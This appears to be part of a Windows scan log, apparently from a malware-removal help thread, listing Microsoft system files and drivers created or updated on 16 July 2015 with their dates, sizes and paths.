2015-07-16 12:35 - 2015-07-02 14:59 - 01545728 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2015-07-16 12:00 - 2015-04-13 18:37 - 00275968 _____ (Microsoft Corporation) C:\WINDOWS\system32\authz.dll
2015-07-16 12:00 - 2015-04-13 18:34 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authz.dll
2015-07-16 11:55 - 2015-07-01 18:08 - 05923840 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2015-07-16 11:55 - 2015-07-01 17:14 - 04520448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2015-07-16 11:51 - 2015-02-03 19:58 - 00264000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdFilter.sys
2015-07-16 11:51 - 2015-02-03 19:58 - 00114496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdNisDrv.sys
2015-07-16 11:51 - 2015-02-03 19:58 - 00044024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdBoot.sys
2015-07-16 11:51 - 2015-02-02 19:53 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\winshfhc.dll
2015-07-16 11:51 - 2015-02-02 19:53 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winshfhc.dll
2015-07-16 11:51 - 2014-11-09 22:29 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceSetupStatusProvider.dll
2015-07-16 11:51 - 2014-11-09 21:51 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DeviceSetupStatusProvider.dll
2015-07-16 11:50 - 2015-07-09 15:51 - 00136904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2015-07-16 11:50 - 2015-07-09 14:40 - 00359936 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSetupUI.dll
2015-07-16 11:50 - 2015-07-09 12:03 - 03701760 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2015-07-16 11:50 - 2015-07-09 11:54 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe
2015-07-16 11:50 - 2015-07-09 11:53 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll
2015-07-16 11:50 - 2015-07-09 11:50 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUSettingsProvider.dll
2015-07-16 11:50 - 2015-07-09 11:50 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2015-07-16 11:50 - 2015-07-09 11:48 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2015-07-16 11:50 - 2015-07-09 11:46 - 02229248 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll
2015-07-16 11:50 - 2015-07-09 11:38 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe
2015-07-16 11:50 - 2015-07-09 11:37 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll
2015-07-16 11:50 - 2015-07-09 11:35 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2015-07-16 11:50 - 2015-07-09 11:34 - 00721920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2015-07-16 11:50 - 2015-06-26 23:08 - 00066048 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2015-07-16 11:50 - 2015-06-26 23:08 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2015-07-16 11:50 - 2015-06-26 22:14 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wups.dll
2015-07-16 11:42 - 2015-05-07 13:50 - 22292672 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2015-07-16 11:42 - 2015-05-07 13:00 - 03109376 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2015-07-16 11:42 - 2015-05-07 12:53 - 19734960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2015-07-16 11:42 - 2015-05-07 12:12 - 02706432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2015-07-16 11:42 - 2015-03-14 04:20 - 01385256 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2015-07-16 11:42 - 2015-03-14 04:13 - 01124352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2015-07-16 11:42 - 2014-12-08 23:45 - 00393728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scesrv.dll
2015-07-16 11:42 - 2014-12-08 21:56 - 00538624 _____ (Microsoft Corporation) C:\WINDOWS\system32\scesrv.dll
2015-07-16 11:36 - 2015-04-24 22:34 - 00653824 _____ (Microsoft Corporation) C:\WINDOWS\system32\comctl32.dll
2015-07-16 11:36 - 2015-04-24 22:33 - 00549888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.dll
2015-07-16 11:36 - 2015-04-09 21:00 - 01996800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2015-07-16 11:36 - 2015-04-09 20:50 - 01387008 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2015-07-16 11:36 - 2015-04-09 20:26 - 01560576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2015-07-16 11:35 - 2015-03-23 17:59 - 07476032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2015-07-16 11:35 - 2015-03-23 17:59 - 01733952 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2015-07-16 11:35 - 2015-03-23 17:59 - 00360480 _____ (Microsoft Corporation) C:\WINDOWS\system32\sechost.dll
2015-07-16 11:35 - 2015-03-23 17:58 - 01498872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2015-07-16 11:35 - 2015-03-23 17:45 - 00257216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sechost.dll
2015-07-16 11:35 - 2015-03-20 00:12 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2015-07-16 11:35 - 2015-03-20 00:10 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64.dll
2015-07-16 11:35 - 2015-03-20 00:10 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64cpu.dll
2015-07-16 11:35 - 2015-03-19 23:17 - 00411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\tracerpt.exe
2015-07-16 11:35 - 2015-03-19 22:41 - 00369152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tracerpt.exe
2015-07-16 11:35 - 2015-03-19 22:40 - 00950784 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdh.dll
2015-07-16 11:35 - 2015-03-19 22:16 - 00749568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdh.dll
2015-07-16 11:35 - 2014-10-28 21:57 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntvdm64.dll
2015-07-16 11:35 - 2014-10-28 21:15 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntvdm64.dll
2015-07-16 11:35 - 2014-10-28 21:15 - 00005632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wow32.dll
2015-07-16 11:35 - 2014-10-28 21:14 - 00004096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user.exe
2015-07-16 11:35 - 2014-10-28 21:13 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setup16.exe
2015-07-16 11:35 - 2014-10-28 21:13 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\instnm.exe
2015-07-16 11:34 - 2015-02-02 20:03 - 03551744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2015-07-16 11:34 - 2015-02-02 20:02 - 04298240 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2015-07-16 11:34 - 2015-01-29 22:03 - 01488896 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfc42u.dll
2015-07-16 11:34 - 2015-01-29 22:03 - 01464832 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfc42.dll
2015-07-16 11:34 - 2015-01-29 21:44 - 01230336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfc42u.dll
2015-07-16 11:34 - 2015-01-29 21:42 - 01204224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfc42.dll
2015-07-16 11:34 - 2014-06-09 18:13 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2015-07-16 11:34 - 2014-06-09 18:13 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2015-07-16 11:33 - 2015-05-03 11:09 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2015-07-16 11:33 - 2015-05-03 10:58 - 00210944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2015-07-16 11:33 - 2015-05-03 10:55 - 00971776 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSShared.dll
2015-07-16 11:33 - 2015-05-03 10:49 - 00811008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSShared.dll
2015-07-16 11:33 - 2015-03-05 22:47 - 01696256 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtsvc.dll
2015-07-16 11:33 - 2015-02-17 19:19 - 00186368 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpapisrv.dll
2015-07-16 11:33 - 2015-01-27 22:24 - 00075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorageContextHandler.dll
2015-07-16 11:33 - 2015-01-27 21:47 - 00060928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StorageContextHandler.dll
2015-07-16 11:17 - 2015-01-30 19:20 - 00203264 _____ (Microsoft Corporation) C:\WINDOWS\system32\ubpm.dll
2015-07-16 11:17 - 2015-01-27 00:22 - 00131584 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2015-07-16 11:17 - 2015-01-26 22:11 - 03547648 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2015-07-16 11:16 - 2015-03-13 21:51 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wu.upgrade.ps.dll
2015-07-16 11:16 - 2015-03-13 20:09 - 00200192 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2015-07-16 11:16 - 2014-10-18 02:50 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaext.dll
2015-07-16 11:16 - 2014-07-23 23:20 - 00875688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcr120_clr0400.dll
2015-07-16 11:16 - 2014-07-23 23:20 - 00869544 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcr120_clr0400.dll
2015-07-16 11:15 - 2015-05-11 12:34 - 00332800 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcpl.dll
2015-07-16 11:15 - 2015-05-07 12:47 - 00564224 _____ (Microsoft Corporation) C:\WINDOWS\system32\apphelp.dll
2015-07-16 11:15 - 2015-03-10 21:49 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdbinst.exe
2015-07-16 11:15 - 2015-03-10 21:09 - 00021504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sdbinst.exe
2015-07-16 11:14 - 2015-05-12 09:19 - 00294912 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemEventsBrokerServer.dll
2015-07-16 11:14 - 2015-05-03 11:07 - 07784448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2015-07-16 11:14 - 2015-05-03 10:57 - 05264384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2015-07-16 11:14 - 2015-05-01 19:33 - 00410739 _____ C:\WINDOWS\system32\ApnDatabase.xml
2015-07-16 11:10 - 2015-04-29 19:22 - 00130048 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2015-07-16 11:10 - 2015-01-26 23:44 - 00933888 _____ (Microsoft Corporation) C:\WINDOWS\system32\calc.exe
2015-07-16 11:10 - 2015-01-23 21:51 - 00816128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\calc.exe
2015-07-16 11:09 - 2014-10-30 19:39 - 01970432 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2015-07-16 11:09 - 2014-10-30 19:38 - 01612992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2015-07-16 11:03 - 2015-03-17 13:26 - 00467776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2015-07-16 10:57 - 2015-06-24 22:31 - 04177920 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2015-07-16 10:57 - 2015-06-15 18:41 - 00065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
2015-07-16 10:57 - 2015-06-15 18:24 - 03320320 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2015-07-16 10:57 - 2015-06-15 17:16 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msiexec.exe
2015-07-16 10:57 - 2015-06-15 17:09 - 03607552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2015-07-16 10:57 - 2015-06-15 16:50 - 02774528 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2015-07-16 10:57 - 2015-06-15 15:57 - 02460160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2015-07-16 10:57 - 2015-01-23 03:17 - 00723072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SHCore.dll
2015-07-16 10:57 - 2015-01-23 01:02 - 00560392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SHCore.dll
2015-07-16 10:54 - 2015-01-28 21:58 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\photowiz.dll
2015-07-16 10:54 - 2015-01-28 21:29 - 00290816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\photowiz.dll
2015-07-16 10:50 - 2015-04-30 19:05 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2015-07-16 10:50 - 2015-04-30 18:48 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2015-07-16 10:37 - 2015-03-19 21:56 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ahcache.sys
2015-07-16 10:36 - 2015-03-19 23:49 - 00309760 _____ (Microsoft Corporation) C:\WINDOWS\system32\compstui.dll
2015-07-16 10:36 - 2015-03-19 23:08 - 00477184 _____ (Microsoft Corporation) C:\WINDOWS\system32\puiobj.dll
2015-07-16 10:36 - 2015-03-19 22:37 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\puiobj.dll
2015-07-16 10:36 - 2015-03-19 22:07 - 01091072 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2015-07-16 10:36 - 2015-01-28 21:04 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2015-07-16 10:31 - 2015-03-03 21:32 - 00172544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2015-07-16 10:31 - 2015-03-03 21:12 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2015-07-16 10:30 - 2015-03-01 21:43 - 00222208 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastapi.dll
2015-07-16 10:30 - 2015-03-01 21:21 - 00207872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastapi.dll
2015-07-16 10:30 - 2015-01-29 20:53 - 02819584 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers.dll
2015-07-16 10:30 - 2014-11-14 02:58 - 00116736 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsDatabase.dll
2015-07-16 10:16 - 2015-04-01 18:22 - 02985984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2015-07-16 10:16 - 2015-04-01 18:20 - 04417536 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2015-07-16 10:16 - 2015-03-31 23:45 - 01491456 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll
2015-07-16 10:16 - 2015-03-31 22:31 - 01207296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2015-07-16 10:16 - 2015-03-12 21:11 - 02162176 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2015-07-16 10:16 - 2015-03-12 20:39 - 01812992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2015-07-16 10:16 - 2015-02-05 16:24 - 01113920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2015-07-16 10:16 - 2015-01-29 23:01 - 00097792 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidbth.sys
2015-07-16 10:16 - 2015-01-29 22:02 - 00102912 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappgnui.dll
2015-07-16 10:16 - 2015-01-29 21:40 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappgnui.dll
2015-07-16 10:16 - 2015-01-29 21:37 - 00331776 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapp3hst.dll
2015-07-16 10:16 - 2015-01-29 21:29 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\atlthunk.dll
2015-07-16 10:16 - 2015-01-29 21:24 - 00339456 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapphost.dll
2015-07-16 10:16 - 2015-01-29 21:24 - 00250880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapp3hst.dll
2015-07-16 10:16 - 2015-01-29 21:16 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapphost.dll
2015-07-16 10:16 - 2015-01-29 21:08 - 00346112 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappcfg.dll
2015-07-16 10:16 - 2015-01-29 21:06 - 00278016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappcfg.dll
2015-07-16 10:16 - 2014-12-11 22:04 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWbPrxy.exe
2015-07-16 10:16 - 2014-12-05 23:17 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncsi.dll
2015-07-16 10:16 - 2014-12-05 21:41 - 00391680 _____ (Microsoft Corporation) C:\WINDOWS\system32\nlasvc.dll
2015-07-16 10:14 - 2015-03-12 22:02 - 00316416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\udfs.sys
2015-07-16 10:14 - 2014-11-04 15:25 - 00059712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kbdclass.sys
2015-07-16 10:14 - 2014-11-04 15:25 - 00051008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mouclass.sys
2015-07-16 10:14 - 2014-11-04 02:55 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sermouse.sys
2015-07-16 10:14 - 2014-11-04 02:54 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\i8042prt.sys
2015-07-16 10:14 - 2014-11-04 02:54 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kbdhid.sys
2015-07-16 10:14 - 2014-11-04 02:54 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mouhid.sys
2015-07-16 10:13 - 2015-04-08 18:41 - 00158720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rgb9rast.dll
2015-07-16 10:13 - 2015-04-02 20:35 - 00445440 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoMetadataHandler.dll
2015-07-16 10:13 - 2015-04-02 20:14 - 00364544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoMetadataHandler.dll
2015-07-16 10:10 - 2015-06-29 18:43 - 00026288 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2015-07-16 10:10 - 2015-06-29 11:07 - 01145856 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2015-07-16 10:10 - 2015-06-29 11:07 - 01084928 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2015-07-16 10:10 - 2015-06-29 11:07 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2015-07-16 10:10 - 2015-06-29 11:07 - 00433152 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2015-07-16 10:10 - 2015-06-29 11:07 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2015-07-16 10:10 - 2015-06-26 19:21 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2015-07-16 10:10 - 2015-06-26 19:21 - 00227328 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepdu.dll
2015-07-16 10:10 - 2015-05-21 09:08 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2015-07-16 10:09 - 2015-04-08 18:55 - 00410128 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe
2015-07-16 10:09 - 2014-12-19 02:26 - 00140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2015-07-16 10:08 - 2015-03-12 22:58 - 00259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\pku2u.dll
2015-07-16 10:08 - 2015-03-12 22:37 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pku2u.dll
2015-07-16 10:08 - 2015-01-19 14:42 - 01487976 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2015-07-16 09:54 - 2015-04-09 20:40 - 01249280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2015-07-16 09:54 - 2015-04-09 20:17 - 01018880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2015-07-16 09:44 - 2015-04-16 02:17 - 00325464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2015-07-16 09:37 - 2015-06-10 23:49 - 01380600 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2015-07-16 09:37 - 2015-06-10 12:13 - 01097216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2015-07-16 09:37 - 2015-04-01 00:21 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2015-07-16 09:37 - 2015-04-01 00:18 - 00468480 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssph.dll
2015-07-16 09:37 - 2015-04-01 00:17 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssphtb.dll
2015-07-16 09:37 - 2015-04-01 00:08 - 00774144 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssvp.dll
2015-07-16 09:37 - 2015-03-31 23:46 - 03633664 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2015-07-16 09:37 - 2015-03-31 23:17 - 02551808 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2015-07-16 09:37 - 2015-03-31 23:17 - 00903168 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2015-07-16 09:37 - 2015-03-31 22:53 - 00391680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssph.dll
2015-07-16 09:37 - 2015-03-31 22:53 - 00272896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2015-07-16 09:37 - 2015-03-31 22:45 - 02749952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2015-07-16 09:37 - 2015-03-31 22:45 - 00699392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssvp.dll
2015-07-16 09:37 - 2015-03-31 22:14 - 01920000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2015-07-16 09:37 - 2015-03-31 22:12 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2015-07-16 09:37 - 2015-02-24 04:32 - 00991552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2015-07-16 09:37 - 2015-01-29 14:45 - 01763352 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2015-07-16 09:37 - 2015-01-29 14:34 - 01488040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2015-07-16 09:37 - 2014-12-11 01:36 - 00046456 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockScreenContentServer.exe
2015-07-16 09:36 - 2015-06-16 01:36 - 01661576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2015-07-16 09:36 - 2015-06-16 01:36 - 01212248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2015-07-16 09:36 - 2015-04-28 09:13 - 00513480 _____ C:\WINDOWS\SysWOW64\locale.nls
2015-07-16 09:36 - 2015-04-28 09:13 - 00513480 _____ C:\WINDOWS\system32\locale.nls
2015-07-16 09:36 - 2015-04-23 11:47 - 03084288 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2015-07-16 09:36 - 2015-04-23 11:16 - 02471424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2015-07-16 09:36 - 2015-03-05 23:08 - 02067968 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpdshext.dll
2015-07-16 09:36 - 2015-03-05 22:43 - 01969664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpdshext.dll
2015-07-16 09:36 - 2015-03-04 06:25 - 00377152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2015-07-16 09:36 - 2015-03-03 23:04 - 00075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\clfsw32.dll
2015-07-16 09:36 - 2015-03-03 22:19 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clfsw32.dll
2015-07-16 09:36 - 2015-02-07 19:57 - 01090048 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll
2015-07-16 09:36 - 2015-02-07 19:49 - 00791040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MrmCoreR.dll
2015-07-16 09:36 - 2015-01-27 21:31 - 00402432 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPhoto.dll
2015-07-16 09:36 - 2015-01-27 21:11 - 00357376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPhoto.dll
2015-07-16 09:35 - 2015-01-27 19:47 - 02501368 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2015-07-16 09:35 - 2015-01-27 19:41 - 02207488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2015-07-16 08:42 - 2015-06-28 01:07 - 00442712 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2015-07-16 08:42 - 2015-06-28 01:07 - 00178008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2015-07-16 08:42 - 2015-06-28 01:06 - 01311960 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
2015-07-16 08:42 - 2015-06-28 01:06 - 00332120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2015-07-16 08:42 - 2015-06-27 12:42 - 00747520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2015-07-16 08:42 - 2015-06-26 23:13 - 00202240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2015-07-16 08:42 - 2015-06-26 23:12 - 00401408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2015-07-16 08:42 - 2015-06-26 23:12 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2015-07-16 08:42 - 2015-06-26 22:40 - 00445440 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
2015-07-16 08:42 - 2015-06-26 22:05 - 01441792 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2015-07-16 08:42 - 2015-06-26 22:00 - 00989184 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2015-07-16 08:42 - 2015-06-26 21:53 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
2015-07-16 08:42 - 2015-06-26 21:26 - 00802816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2015-07-16 08:42 - 2015-03-30 01:47 - 00561928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2015-07-16 08:41 - 2015-05-30 17:18 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\werdiagcontroller.dll
